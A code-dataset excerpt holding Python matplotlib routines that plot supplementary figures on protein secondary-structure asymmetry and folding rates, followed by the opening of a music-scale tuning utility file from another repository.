ax.fill_between(Rdist_data['grid'], Rdist_data[k][1], Rdist_data[k][2], color=col[i], alpha=0.5)
ax.plot([0,0], [0, 0.60], ':', c='k', alpha=0.7)
ax.set_xlabel(r'$\log_{10} R$')
ax.set_ylabel('Density')
ax.set_xticks(np.arange(-6, 5, 2))
ax.set_xlim(-7, 2)
ax.set_ylim(0, 0.60)
ax.legend(loc='upper center', bbox_to_anchor=(0.55, 1.17), frameon=False, ncol=3, columnspacing=2)
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
def fig10b(fig, ax, pdb, Y='S_ASYM'):
ft = 12
X = np.arange(10)
width = .35
ttls = [r'$\alpha$ Helix', r'$\beta$ Sheet']
lbls = [r'$E_{\alpha}$', r'$E_{\beta}$']
# col = np.array(Paired_12.hex_colors)[[1,5]]
custom_cmap = sns.diverging_palette(230, 22, s=100, l=47, n=13)
c_helix = custom_cmap[0]
c_sheet = custom_cmap[12]
col = [c_helix, c_sheet]
bins = np.linspace(-0.20, 0.20, 80)
width = np.diff(bins[:2])
X = bins[:-1] + width * 0.5
mid = 39
sep = 0.05
enrich_data = pickle.load(open(PATH_FIG_DATA.joinpath("fig3_enrich_acpro.pickle"), 'rb'))
quantiles = enrich_data['edges'].mean(axis=0)
for i, Y in enumerate(['H_ASYM', 'S_ASYM']):
for j in range(len(quantiles)-1):
hist, bins = np.histogram(pdb.loc[pdb.quant==j, Y], bins=bins)
hist = hist / hist.sum()
# total = len(pdb)/10
# left = len(pdb.loc[(pdb.quant==j)&(pdb[Y]<0)]) / total
# right = len(pdb.loc[(pdb.quant==j)&(pdb[Y]>0)]) / total
# print(Y, j, ''.join([f"{x:6.3f}" for x in [left, right, left/right, right / left]]))
if i:
ax[i].bar(X[:mid], (hist/hist.sum())[:mid], width, bottom=[sep*j]*mid, color='grey', alpha=.5)
ax[i].bar(X[-mid:], (hist/hist.sum())[-mid:], width, bottom=[sep*j]*mid, color=col[i], alpha=.5)
else:
ax[i].bar(X[:mid], (hist/hist.sum())[:mid], width, bottom=[sep*j]*mid, color=col[i], alpha=.5)
ax[i].bar(X[-mid:], (hist/hist.sum())[-mid:], width, bottom=[sep*j]*mid, color='grey', alpha=.5)
ax[i].plot(X[:mid], (hist/hist.sum()+sep*j)[:mid], '-', c='k', alpha=.5)
ax[i].plot(X[-mid:], (hist/hist.sum()+sep*j)[-mid:], '-', c='k', alpha=.5)
mean = np.mean(enrich_data[Y[0]], axis=0)
lo = np.abs(mean - np.quantile(enrich_data[Y[0]], 0.025, axis=0))
hi = np.abs(mean - np.quantile(enrich_data[Y[0]], 0.975, axis=0))
ax[2].barh([sep*j+(i+.7)*sep/3 for j in range(10)], mean, sep/3, xerr=(lo, hi), color=col[i], ec='k', alpha=.5, label=lbls[i], error_kw={'lw':.8})
ax[2].plot([0,0], [-0.05, 0.5], '-', c='k', lw=.1)
ax[0].set_yticks(np.arange(len(quantiles))*sep)
ax[0].set_yticklabels([round(x,1) for x in quantiles])
ax[2].legend(loc='upper center', ncol=2, columnspacing=1.5, frameon=False,
bbox_to_anchor=(0.52, 1.15))
for i, t in zip([0,1], ttls):
ax[i].set_title(t)
ax[i].set_xlim(-.15, .15)
ax[i].set_xticks([-.1, 0, .1])
for i in range(3):
ax[i].spines['top'].set_visible(False)
ax[i].spines['right'].set_visible(False)
ax[i].set_ylim(0-sep/4, 0.5+sep)
for i in [1,2]:
ax[i].spines['left'].set_visible(False)
ax[i].set_yticks([])
ax[0].set_xlabel(r"asym$_{\alpha}$")
ax[1].set_xlabel(r"asym$_{\beta}$")
ax[0].set_ylabel(r'$\log_{10}R$')
ax[2].set_xlabel('N terminal\nEnrichment')
pdb = pdb.loc[pdb.OC!='Viruses']
X = np.arange(10)
X = np.array([sep*j+(i+.7)*sep/3 for j in range(10)])
width = .175
ttls = ['Eukaryote ', 'Prokaryote ']
lbls = [r'$E_{\alpha}$', r'$E_{\beta}$']
custom_cmap = sns.diverging_palette(230, 22, s=100, l=47, n=13)
col = [custom_cmap[i] for i in [3, 9, 0, 12]]
paths = [f"fig3_enrich_{a}_acpro.pickle" for a in ['eukaryote', 'prokaryote']]
for i, path in enumerate(paths):
enrich_data = pickle.load(open(PATH_FIG_DATA.joinpath(path), 'rb'))
for j, Y in enumerate(['H_ASYM', 'S_ASYM']):
# adjust = (j - 1 + i*2)*width
adjust = (j*2 - 4.0 + i)*(sep/5)
mean = np.mean(enrich_data[Y[0]], axis=0)
lo = np.abs(mean - np.quantile(enrich_data[Y[0]], 0.025, axis=0))
hi = np.abs(mean - np.quantile(enrich_data[Y[0]], 0.975, axis=0))
print(i, Y, max(np.abs(mean)))
ax[3].barh(X+adjust, mean, sep/5.0, ec='k', xerr=(lo, hi), color=col[i*2+j],
label=ttls[i]+lbls[j], lw=0.001, error_kw={'lw':.2})
ax[3].plot([0,0], [-0.05, 0.5], '-', c='k', lw=.1)
ax[3].set_yticks(np.arange(len(quantiles))*sep)
ax[3].set_ylabel(r'$\log_{10} R$')
ax[3].set_yticklabels([round(x,1) for x in quantiles])
ax[3].set_xlabel('N terminal\nEnrichment')
ax[3].set_xlim(-.42, .42)
ax[3].set_ylim(0-sep/4, 0.5+sep)
ax[3].spines['top'].set_visible(False)
ax[3].spines['left'].set_visible(False)
handles = [mpatches.Patch([], [], color=col[j*2+i], label=ttls[j]+lbls[i]) for i in [0,1] for j in [1,0]]
ax[3].legend(handles=handles, bbox_to_anchor=(1.05, 1.25), frameon=False,
loc='upper right', ncol=2, columnspacing=1.0, handlelength=1.5)
ax[3].yaxis.set_label_position('right')
ax[3].yaxis.tick_right()
####################################################################
### FIG 11
def fig11(pdb, X='AA_PDB', Y='CO', w=.1, ax='', fig=''):
if isinstance(ax, str):
fig, ax = plt.subplots(4,2, figsize=(9,12))
fig.subplots_adjust(wspace=0.0, hspace=0.65)
# ax = ax.reshape(ax.size)
pdb_CO = np.load(PATH_FIG_DATA.joinpath("pdb_config_CO.npy"))[:,:,0]
df = pdb.copy()
q = np.arange(w,1+w,w)
lbls = ['Helix', 'Sheet']
# cb_lbl = [r"$E_{\alpha}$", r"$E_{\beta}$"]
cb_lbl = [r"$asym_{\alpha}$", r"$asym_{\beta}$"]
vmax = 0.03
vmin = -vmax
for j, co in enumerate(pdb_CO.T):
df['CO'] = co
quant1 = [df[X].min()] + list(df[X].quantile(q).values)
quant2 = [df[Y].min()] + list(df[Y].quantile(q).values)
for i, Z in enumerate(['H_ASYM', 'S_ASYM']):
mean = []
for l1, h1 in zip(quant1[:-1], quant1[1:]):
for l2, h2 in zip(quant2[:-1], quant2[1:]):
samp = df.loc[(df[X]>=l1)&(df[X]<h1)&(df[Y]>=l2)&(df[Y]<h2), Z]
mean.append(samp.mean())
# left = len(df.loc[(df[X]>=l1)&(df[X]<h1)&(df[Y]>=l2)&(df[Y]<h2)&(df[Z]<0)])
# right = len(df.loc[(df[X]>=l1)&(df[X]<h1)&(df[Y]>=l2)&(df[Y]<h2)&(df[Z]>0)])
# tot = max(len(df.loc[(df[X]>=l1)&(df[X]<h1)&(df[Y]>=l2)&(df[Y]<h2)]), 1)
# mean.append((right - left)/tot)
cmap = sns.diverging_palette(230, 22, s=100, l=47, as_cmap=True)
norm = colors.BoundaryNorm([vmin, vmax], cmap.N)
bounds = np.linspace(vmin, vmax, 3)
im = ax[j,i].imshow(np.array(mean).reshape(q.size, q.size).T, cmap=cmap, vmin=vmin, vmax=vmax)
cbar = fig.colorbar(im, cmap=cmap, ticks=bounds, ax=ax[j,i], fraction=0.046, pad=0.04)
cbar.set_label(cb_lbl[i], labelpad=-5)
ax[j,i].set_title(lbls[i])
ax[j,i].set_xticks(np.arange(q.size+1)-0.5)
ax[j,i].set_yticks(np.arange(q.size+1)-0.5)
ax[j,i].set_xticklabels([int(x) for x in quant1], rotation=90)
ax[j,i].set_yticklabels([int(round(x,0)) for x in quant2])
for a in ax.ravel():
a.invert_yaxis()
a.set_xlabel('Sequence Length')
a.set_ylabel('Contact Order')
a.tick_params(axis='both', which='major', direction='in')
fs = 14
for i, b in zip(range(4), list('ABCDEFGHI')):
ax[i,0].text( -0.20, 1.16, b, transform=ax[i,0].transAxes, fontsize=fs)
fig.savefig(PATH_FIG.joinpath("si11.pdf"), bbox_inches='tight')
def fig12(pdb, X='REL_RATE', Y='S_ASYM', w=0.1):
fig = plt.figure(figsize=(8,12))
gs = GridSpec(3,2, wspace=0.4, hspace=0.5, width_ratios=[1,1])
ax_all = [[fig.add_subplot(gs[j,i]) for i in [0,1]] for j in range(3)]
custom_cmap = sns.diverging_palette(230, 22, s=100, l=47, n=13)
c_helix = custom_cmap[2]
c_sheet = custom_cmap[10]
col = [c_helix, c_sheet]
bins = np.linspace(-0.20, 0.20, 80)
width = np.diff(bins[:2])
mid = 39
sep = 0.05
lbls = ['Sheet', 'Helix']
quantiles = pdb[X].quantile(np.arange(0,1+w,w)).values
# print(np.round(quantiles, 2))
pdb['quant'] = pdb[X].apply(lambda x: utils.assign_quantile(x, quantiles))
# pdb['quant'] = np.random.choice(pdb['quant'], len(pdb), replace=False)
for ax, threshold in zip(ax_all, [0, 0.025, 0.05]):
print(f"threshold = {threshold}")
for i, Y in enumerate(['S_ASYM', 'H_ASYM']):
ratio1 = []
ratio2 = []
lefts = []
rights = []
for j in range(len(quantiles)-1):
hist, bins = np.histogram(pdb.loc[pdb.quant==j, Y], bins=bins)
hist = hist / hist.sum()
left = len(pdb.loc[(pdb.quant==j)&(pdb[Y]<-threshold)]) / max(len(pdb.loc[(pdb.quant==j)]), 1)
right = len(pdb.loc[(pdb.quant==j)&(pdb[Y]>threshold)]) / max(len(pdb.loc[(pdb.quant==j)]), 1)
lefts.append(left)
rights.append(right)
ratio1.append((right - left))
ratio2.append(np.log2(right / left))
print(Y, j, left, right)
xgrid = [sep*j+(i+1.0)*sep/3 for j in range(len(quantiles)-1)]
ax[0].barh(xgrid, ratio1, sep/3, color=col[i], alpha=.5)
ax[1].barh(xgrid, ratio2, sep/3, color=col[i], alpha=.5)
ax[0].set_xticks(np.arange(-0.3, 0.4, 0.1))
for a in ax:
a.set_yticks(np.arange(len(quantiles))*sep)
a.set_yticklabels([round(x,1) for x in quantiles])
a.plot([0,0], [-0.05, 0.5], '-', c='k', lw=.1)
a.spines['top'].set_visible(False)
a.spines['right'].set_visible(False)
a.set_ylim(0, 0.5)
a.set_ylabel(r'$\log_{10}R$')
ax[0].set_xlim(-0.35, 0.35)
ax[1].set_xlim(-1.50, 1.50)
ax[0].set_xlabel(r'$P(\mathregular{{asym}} \geq {0}) - P(\mathregular{{asym}} \leq -{0})$'.format(*[threshold]*2))
ax[1].set_xlabel(r'$\log_{{2}} \frac{{P(\mathregular{{asym}} \geq {0})}}{{P(\mathregular{{asym}} \leq -{0})}} $'.format(*[threshold]*2))
fig.savefig(PATH_FIG.joinpath("si12.pdf"), bbox_inches='tight')
def fig13(df, X='AA_PDB', Y='CO', w=.1, ax='', fig=''):
if isinstance(ax, str):
fig, ax = plt.subplots(1,3, figsize=(15,4))
fig.subplots_adjust(wspace=0.5)
q = np.arange(w,1+w,w)
quant1 = [df[X].min()] + list(df[X].quantile(q).values)
quant2 = [df[Y].min()] + list(df[Y].quantile(q).values)
lbls = ['Helix', 'Sheet']
cb_lbl = [r"$asym_{\alpha}$", r"$asym_{\beta}$"]
vmax = 0.03
vmin = -vmax
count = []
for i, Z in enumerate(['H_ASYM', 'S_ASYM']):
mean = []
for l1, h1 in zip(quant1[:-1], quant1[1:]):
for l2, h2 in zip(quant2[:-1], quant2[1:]):
samp = df.loc[(df[X]>=l1)&(df[X]<h1)&(df[Y]>=l2)&(df[Y]<h2), Z]
mean.append(samp.mean())
# left = len(df.loc[(df[X]>=l1)&(df[X]<h1)&(df[Y]>=l2)&(df[Y]<h2)&(df[Z]<0)])
# right = len(df.loc[(df[X]>=l1)&(df[X]<h1)&(df[Y]>=l2)&(df[Y]<h2)&(df[Z]>0)])
# tot = max(len(df.loc[(df[X]>=l1)&(df[X]<h1)&(df[Y]>=l2)&(df[Y]<h2)]), 1)
# mean.append((right - left)/tot)
if not i:
count.append(len(samp))
# print(len(samp))
mean = np.array(mean).reshape(q.size, q.size)
count = np.array(count).reshape(q.size, q.size)
cmap = sns.diverging_palette(230, 22, s=100, l=47, as_cmap=True)
norm = colors.BoundaryNorm([vmin, vmax], cmap.N)
bounds = np.linspace(vmin, vmax, 3)
im = ax[i].imshow(mean.T, cmap=cmap, vmin=vmin, vmax=vmax)
cbar = fig.colorbar(im, cmap=cmap, ticks=bounds, ax=ax[i], fraction=0.046, pad=0.04)
cbar.set_label(cb_lbl[i], labelpad=-5)
ax[i].set_title(lbls[i])
ax[i].set_xticks(np.arange(q.size+1)-0.5)
ax[i].set_yticks(np.arange(q.size+1)-0.5)
ax[i].set_xticklabels([int(x) for x in quant1], rotation=90)
ax[i].set_yticklabels([int(round(x,0)) for x in quant2])
for i in [2]:
cmap = plt.cm.Greys
# norm = colors.BoundaryNorm([-.04, .04], cmap.N)
# bounds = np.linspace(-.04, .04, 5)
im = ax[i].imshow(np.array(count).reshape(q.size, q.size).T, cmap=cmap, vmin=0)
cbar = fig.colorbar(im, cmap=cmap, ax=ax[i], fraction=0.046, pad=0.04)
cbar.set_label('Count')
ax[i].set_title('Distribution')
ax[i].set_xticks(np.arange(q.size+1)-0.5)
ax[i].set_yticks(np.arange(q.size+1)-0.5)
ax[i].set_xticklabels([int(x) for x in quant1], rotation=90)
ax[i].set_yticklabels([int(round(x,0)) for x in quant2])
for a in ax:
a.invert_yaxis()
a.set_xlabel('Sequence Length')
a.set_ylabel('Contact Order')
a.tick_params(axis='both', which='major', direction='in')
fs = 14
for i, b in zip([0,1,2], list('ABCDEFGHI')):
ax[i].text( -0.20, 1.05, b, transform=ax[i].transAxes, fontsize=fs)
fig.savefig(PATH_FIG.joinpath("si13.pdf"), bbox_inches='tight')
def scop_ss():
fig, ax = plt.subplots(2,1)
cat = 'HS.D'
N = 50
X = np.arange(50)
Nboot, Cboot, asym, enrich_edges, enrich_vals = pickle.load(open(PATH_FIG_DATA.joinpath(f"pdb_scop_indep.pickle"), 'rb'))
data = [Nboot, Cboot, asym]
custom_cmap = sns.diverging_palette(230, 22, s=100, l=47, n=13)
c_helix = custom_cmap[2]
c_sheet = custom_cmap[10]
col = [c_helix, c_sheet, "#CB7CE6", "#79C726"]
lbls = ['Helix', 'Sheet', 'Coil', 'Disorder']
for j, s in enumerate(cat):
ax[0].plot(X, data[0][s]['mean']/4, '-', c=col[j], label=f"{s} N")
ax[0].fill_between(X, data[0][s]['hi']/4, data[0][s]['lo']/4, color="grey", label=f"{s} N", alpha=0.5)
ax[0].plot(X, data[1][s]['mean']/4, '--', c=col[j], label=f"{s} N")
ax[0].fill_between(X, data[1][s]['hi']/4, data[1][s]['lo']/4, color="grey", label=f"{s} N", alpha=0.2)
print(s, round(np.mean(data[2][s]['mean']), 2), round(np.mean(data[2][s]['mean'][:20]), 2), round(np.mean(data[2][s]['mean'][20:]), 2))
ax[1].plot(X, np.log2(data[2][s]['mean']), '-', c=col[j], label=lbls[j])
ax[1].fill_between(X, np.log2(data[2][s]['hi']), np.log2(data[2][s]['lo']), color="grey", label=f"{s} N", alpha=0.2)
ax[1].set_ylim(-1, 1.3)
ax[1].plot([0]*50, '-', c='k')
ax[1].set_yticks(np.arange(-1,1.5,0.5))
ax[0].set_ylim(0, 0.6)
ax[1].set_xlabel('Sequence distance from ends')
ax[0].set_ylabel('Secondary structure\nprobability')
ax[1].set_ylabel('Structural asymmetry\n$\\log_2 (N / C)$')
fs = 14
for i, b in zip([0,1], list('ABCDEFGHI')):
ax[i].text( -0.10, 1.05, b, transform=ax[i].transAxes, fontsize=fs)
fig.savefig(PATH_FIG.joinpath("si14.pdf"), bbox_inches='tight')
def percentage_asym(x):
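    # Map a log2(N/C) asymmetry x to a signed percentage:
    # sign(x) * 100 * (2**|x| - 1); e.g. x = 1 -> +100%, x = -1 -> -100%.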
return np.sign(x) * 100*2**(abs(x)) - np.sign(x) * 100
def fig15():
fig, ax = plt.subplots(3,1, figsize=(10,10))
cat = 'HS.D'
N = 100
X = np.arange(N)
Nboot, Cboot, asym, = pickle.load(open(PATH_FIG_DATA.joinpath(f"pdb_ss_max_asym.pickle"), 'rb'))
data = [Nboot, Cboot, asym]
custom_cmap = sns.diverging_palette(230, 22, s=100, l=47, n=13)
c_helix = custom_cmap[2]
c_sheet = custom_cmap[10]
col = [c_helix, c_sheet, "#CB7CE6", "#79C726"]
lbls = ['Helix', 'Sheet', 'Coil', 'Disorder']
X2 = np.arange(5)
for j, s in enumerate(cat):
ax[0].plot(X, data[0][s]['mean']/2, '-', c=col[j], label=f"{s} N")
ax[0].fill_between(X, data[0][s]['hi']/2, data[0][s]['lo']/2, color="grey", label=f"{s} N", alpha=0.5)
ax[0].plot(X, data[1][s]['mean']/2, '--', c=col[j], label=f"{s} N")
ax[0].fill_between(X, data[1][s]['hi']/2, data[1][s]['lo']/2, color="grey", label=f"{s} N", alpha=0.2)
for k in range(5):
print(s, round(np.mean(data[2][s]['mean']), 2), round(np.mean(data[2][s]['mean'][k*20:(k+1)*20]), 2))
ax[1].plot(X, np.log2(data[2][s]['mean']), '-', c=col[j], label=lbls[j])
ax[1].fill_between(X, np.log2(data[2][s]['hi']), np.log2(data[2][s]['lo']), color="grey", label=f"{s} N", alpha=0.2)
if s in 'HS':
Y2 = [percentage_asym(np.log2(data[2][s]['mean'])[k*20:(k+1)*20].mean()) for k in range(5)]
ax[2].bar(X2, Y2, 0.5, color=col[j], label=lbls[j], ec='k')
ax[1].set_ylim(-1.5, 2.0)
ax[1].plot([0]*100, '-', c='k')
ax[2].plot([0]*5, '-', c='k')
ax[1].set_yticks(np.arange(-1,2.5,0.5))
ax[0].set_ylim(0, 0.6)
ax[2].set_xticks(np.arange(5))
ax[2].set_xticklabels([f"{i*20} - {(i+1)*20}" for i in range(5)])
ax[0].set_xlabel('Sequence distance from ends')
ax[1].set_xlabel('Sequence distance from ends')
ax[2].set_xlabel('Sequence distance from ends')
ax[0].set_ylabel('Secondary structure\nprobability')
ax[1].set_ylabel('Structural asymmetry\n$\\log_2 (N / C)$')
ax[2].set_ylabel('Percentage asymmetry')
fs = 14
for i, b in zip([0,1,2], list('ABCDEFGHI')):
ax[i].text( -0.10, 1.05, b, transform=ax[i].transAxes, fontsize=fs)
fig.savefig(PATH_FIG.joinpath("si15.pdf"), bbox_inches='tight')
def oligomer(pdb, X='REL_RATE', Y='S_ASYM', w=0.1):
pdb = pdb.copy()
fig = plt.figure(figsize=(8,8))
gs = GridSpec(2,2, wspace=0.4, hspace=0.5, width_ratios=[1,1])
ax_all = [[fig.add_subplot(gs[j,i]) for i in [0,1]] for j in range(2)]
custom_cmap = sns.diverging_palette(230, 22, s=100, l=47, n=13)
c_helix = custom_cmap[2]
c_sheet = custom_cmap[10]
col = [c_helix, c_sheet]
bins = np.linspace(-0.20, 0.20, 80)
width = np.diff(bins[:2])
mid = 39
sep = 0.05
threshold = 0
lbls = [r'$E_{\beta}$', r'$E_{\alpha}$']
ttls = ['Monomers', 'Oligomers']
for ax, idx, ttl in zip(ax_all, [pdb.NPROT==1, pdb.NPROT>1], ttls):
quantiles = pdb.loc[idx, X].quantile(np.arange(0,1+w,w)).values
pdb['quant'] = pdb.loc[idx, X].apply(lambda x: utils.assign_quantile(x, quantiles))
for i, Y in enumerate(['S_ASYM', 'H_ASYM']):
ratio1 = []
ratio2 = []
lefts = []
rights = []
for j in range(len(quantiles)-1):
hist, bins = np.histogram(pdb.loc[(idx)&(pdb.quant==j), Y], bins=bins)
hist = hist / hist.sum()
left = len(pdb.loc[(idx)&(pdb.quant==j)&(pdb[Y]<-threshold)]) / max(len(pdb.loc[(idx)&(pdb.quant==j)]), 1)
right = len(pdb.loc[(idx)&(pdb.quant==j)&(pdb[Y]>threshold)]) / max(len(pdb.loc[(idx)&(pdb.quant==j)]), 1)
lefts.append(left)
rights.append(right)
ratio1.append((right - left))
ratio2.append(np.log2(right / left))
xgrid = [sep*j+(i+1.0)*sep/3 for j in range(len(quantiles)-1)]
ax[0].barh(xgrid, ratio1, sep/3, color=col[i], alpha=.5, label=lbls[i])
ax[1].barh(xgrid, ratio2, sep/3, color=col[i], alpha=.5)
ax[0].set_xticks(np.arange(-0.3, 0.4, 0.1))
for a in ax:
a.set_yticks(np.arange(len(quantiles))*sep)
a.set_yticklabels([round(x,1) for x in quantiles])
a.plot([0,0], [-0.05, 0.5], '-', c='k', lw=.1)
a.spines['top'].set_visible(False)
a.spines['right'].set_visible(False)
a.set_ylim(0, 0.5)
a.set_ylabel(r'$\log_{10}R$')
a.set_title(f"{ttl}, N={np.sum(idx)}")
ax[0].set_xlim(-0.35, 0.35)
ax[1].set_xlim(-1.50, 1.50)
ax[0].set_xlabel(r'$P(\mathregular{{asym}} \geq {0}) - P(\mathregular{{asym}} \leq -{0})$'.format(*[threshold]*2))
ax[1].set_xlabel(r'$\log_{{2}} \frac{{P(\mathregular{{asym}} \geq {0})}}{{P(\mathregular{{asym}} \leq -{0})}} $'.format(*[threshold]*2))
ax[0].legend(loc='upper center', ncol=2, columnspacing=3, frameon=False,
bbox_to_anchor=(1.20, 1.20))
fig.savefig(PATH_FIG.joinpath("si16.pdf"), bbox_inches='tight')
fig.savefig(PATH_FIG.joinpath("oligomers.png"), bbox_inches='tight')
def scop2(X='REL_RATE', Y='S_ASYM', w=0.1):
fig, ax = plt.subplots(figsize=(10,6))
edges, data = pickle.load(open(PATH_FIG_DATA.joinpath("pdb_scop_indep.pickle"), 'rb'))[3:]
edges = edges[0]
sep = 0.05
lbls = [r'$E_{\alpha}$', r'$E_{\beta}$']
for i, Y in enumerate(['H_ASYM', 'S_ASYM']):
mean = np.mean(data[:,i], axis=0)
lo = np.abs(mean - np.quantile(data[:,i], 0.025, axis=0))
hi = np.abs(mean - np.quantile(data[:,i], 0.975, axis=0))
ax.barh([sep*j+(i+.7)*sep/3 for j in range(10)], mean, sep/3, xerr=(lo, hi), color=col[i], ec='k', alpha=.5, label=lbls[i], error_kw={'lw':.8})
ax.plot([0,0], [-0.05, 0.5], '-', c='k', lw=.1)
ax.set_yticks(np.arange(len(edges))*sep)
ax.set_yticklabels([round(x,1) for x in edges])
ax.legend(loc='upper center', ncol=2, columnspacing=3, frameon=False,
bbox_to_anchor=(0.52, 1.06))
ax.set_xlim(-.38, .38)
ax.set_xticks(np.arange(-.3, .4, .1))
# To create this figure, you need to download the complete
# Human and E. coli proteomes at:
# https://alphafold.ebi.ac.uk/download
# and then change the code so that "base" points to the
# folder that contains the downloaded ".pdb" files
def disorder_proteome(N=100):
fig, ax = plt.subplots(1,2, figsize=(12,4))
lbls = ["Human", "Ecoli"]
ttls = ["Human", "E. coli"]
for i, l in enumerate(lbls):
path = PATH_FIG_DATA.joinpath(f"alphafold_{l}.npy")
if not path.exists():
base = PATH_BASE.joinpath(f"AlphaFold/{l}")
countN = np.zeros(N, float)
countC = np.zeros(N, float)
tot = np.zeros(N, float)
with Pool(50) as pool:
dis = list(pool.imap_unordered(utils.get_disorder_from_conf, base.glob("*pdb"), 10))
for d in dis:
n = min(int(len(d)/2), N)
countN[:n] = countN[:n] + d[:n]
countC[:n] = countC[:n] + d[-n:][::-1]
tot[:n] = tot[:n] + 1
fracN = countN / tot
fracC = countC / tot
np.save(path, np.array([fracN, fracC]))
else:
fracN, fracC = np.load(path)
ax[i].plot(np.arange(N)+1, fracN, '-', label='N')
ax[i].plot(np.arange(N)+1, fracC, '--', label='C')
ax[i].set_title(ttls[i])
ax[i].set_xlabel("Sequence distance from ends")
ax[i].set_ylabel("Disorder probability")
ax[i].set_ylim(0, 1)
ax[i].legend(loc='best', frameon=False)
fig.savefig(PATH_FIG.joinpath("si17.pdf"), bbox_inches='tight')
def kfold_vs_ss():
pfdb = asym_io.load_pfdb()
fig, ax = plt.subplots(figsize=(8,8))
for c in pfdb.Class.unique():
X = np.log10(pfdb.loc[pfdb.Class==c, 'L'])
Y = pfdb.loc[pfdb.Class==c, 'log_kf']
sns.regplot(X, Y, label=c)
ax.set_xlabel(r"$\log_{10}$ Sequence Length")
ax.set_ylabel(r"$\log_{10} k_f$")
ax.legend(loc='best', frameon=False)
fig.savefig(PATH_FIG.joinpath("si18.pdf"), bbox_inches='tight')
def hbond_asym(pdb, Xl='REL_RATE', Y='hb_asym', w=0.1):
fig = plt.figure(figsize=(9,6))
gs = GridSpec(1,2, wspace=0.2, hspace=0.0, width_ratios=[1,.3])
ax = [fig.add_subplot(gs[i]) for i in [0,1]]
col = np.array(Paired_12.hex_colors)[[1,3]]
bins = np.linspace(-0.20, 0.20, 80)
width = np.diff(bins[:2])
X = bins[:-1] + width * 0.5
mid = 39
sep = 0.05
quantiles = pdb[Xl].quantile(np.arange(0,1+w,w)).values
ratio = []
lefts = []
rights = []
threshold = 0.00
for j in range(len(quantiles)-1):
hist, bins = np.histogram(pdb.loc[pdb.quant==j, Y], bins=bins)
hist = hist / hist.sum()
left = len(pdb.loc[(pdb.quant==j)&(pdb[Y]<-threshold)]) / max(len(pdb.loc[(pdb.quant==j)]), 1)
right = len(pdb.loc[(pdb.quant==j)&(pdb[Y]>threshold)]) / max(len(pdb.loc[(pdb.quant==j)]), 1)
lefts.append(left)
rights.append(right)
ratio.append((right - left))
ax[0].bar(X[:mid], (hist/hist.sum())[:mid], width, bottom=[sep*j]*mid, color='grey', alpha=.5)
ax[0].bar(X[-mid:], (hist/hist.sum())[-mid:], width, bottom=[sep*j]*mid, color=col[0], alpha=.5)
ax[0].plot(X[:mid], (hist/hist.sum()+sep*j)[:mid], '-', c='k', alpha=.5)
ax[0].plot(X[-mid:], (hist/hist.sum()+sep*j)[-mid:], '-', c='k', alpha=.5)
ax[0].set_yticks(np.arange(len(quantiles))*sep)
ax[0].set_yticklabels([round(x,1) for x in quantiles])
ax[1].barh([sep*j+sep/2 for j in range(len(quantiles)-1)], ratio, sep/2, color=[col[0] if r > 0 else 'grey' for r in ratio], alpha=.5)
ax[1].plot([0,0], [-0.05, 0.5], '-', c='k', lw=.1)
ax[0].spines['top'].set_visible(False)
ax[0].spines['right'].set_visible(False)
ax[1].spines['top'].set_visible(False)
ax[1].spines['right'].set_visible(False)
ax[1].spines['left'].set_visible(False)
ax[1].set_yticks([])
for a in ax:
a.set_ylim(0, 0.60)
ax[0].set_xlabel('Asymmetry in mean hydrogen bond length')
ax[0].set_ylabel(r'$\log_{10}R$')
ax[1].set_xlabel('N terminal enrichment')
fig.savefig(PATH_FIG.joinpath("si19.pdf"), bbox_inches='tight')
def hyd_asym(pdb, Xl='REL_RATE', Y='hyd_asym', w=0.1):
fig = plt.figure(figsize=(9,6))
gs = GridSpec(1,2, wspace=0.2, hspace=0.0, width_ratios=[1,.3])
ax = [fig.add_subplot(gs[i]) for i in [0,1]]
col = np.array(Paired_12.hex_colors)[[1,3]]
bins = np.linspace(-4.5, 4.5, 80)
width = np.diff(bins[:2])
X = bins[:-1] + width * 0.5
mid = 39
sep = 0.05
quantiles = pdb[Xl].quantile(np.arange(0,1+w,w)).values
ratio = []
lefts = []
rights = []
threshold = 0.00
for j in range(len(quantiles)-1):
hist, bins = np.histogram(pdb.loc[pdb.quant==j, Y], bins=bins)
hist = hist / hist.sum()
left = len(pdb.loc[(pdb.quant==j)&(pdb[Y]<-threshold)]) / max(len(pdb.loc[(pdb.quant==j)]), 1)
right = len(pdb.loc[(pdb.quant==j)&(pdb[Y]>threshold)]) / max(len(pdb.loc[(pdb.quant==j)]), 1)
lefts.append(left)
rights.append(right)
ratio.append((right - left))
ax[0].bar(X[:mid], (hist/hist.sum())[:mid], width, bottom=[sep*j]*mid, color='grey', alpha=.5)
ax[0].bar(X[-mid:], (hist/hist.sum())[-mid:], width, bottom=[sep*j]*mid, color=col[0], alpha=.5)
ax[0].plot(X[:mid], (hist/hist.sum()+sep*j)[:mid], '-', c='k', alpha=.5)
ax[0].plot(X[-mid:], (hist/hist.sum()+sep*j)[-mid:], '-', c='k', alpha=.5)
ax[0].set_yticks(np.arange(len(quantiles))*sep)
ax[0].set_yticklabels([round(x,1) for x in quantiles])
ax[1].barh([sep*j+sep/2 for j in range(len(quantiles)-1)], ratio, sep/2, color=[col[0] if r > 0 else 'grey' for r in ratio], alpha=.5)
ax[1].plot([0,0], [-0.05, 0.5], '-', c='k', lw=.1)
ax[0].spines['top'].set_visible(False)
ax[0].spines['right'].set_visible(False)
ax[1].spines['top'].set_visible(False)
ax[1].spines['right'].set_visible(False)
ax[1].spines['left'].set_visible(False)
ax[1].set_yticks([])
for a in ax:
a.set_ylim(0, 0.60)
ax[0].set_xlabel('Asymmetry in mean hydrophobicity')
ax[0].set_ylabel(r'$\log_{10}R$')
ax[1].set_xlabel('N terminal enrichment')
fig.savefig(PATH_FIG.joinpath("si20.pdf"), bbox_inches='tight')
```
{
"source": "jomimc/imperfect_fifths",
"score": 2
}
#### File: Scales_database/Src/all_utils.py
```python
import re
import sys
import time
import matplotlib.pyplot as plt
from itertools import permutations
import numpy as np
import pandas as pd
import seaborn as sns
from sklearn.cluster import DBSCAN
import statsmodels.nonparametric.api as smnp
import swifter
INST = np.array([1,0,1,0,1,1,0,1,0,1,1,1,1,0,1,0,1,1,0,1,0,1,1,1,1], dtype=bool)
CENT_DIFF_MAX = 11.0
BETA = 50.
### Theoretical scale markers
### PYT = Pythagorean tuning
### EQ5 = 5-Tone Equal Temperament
### JI = Just intonation
### CHINA = Shi-er-lu
### The rest are sourced from Rechberger, Herman
PYT_INTS = np.array([0., 90.2, 203.9, 294.1, 407.8, 498.1, 611.7, 702., 792.2, 905., 996.1, 1109.8, 1200.])
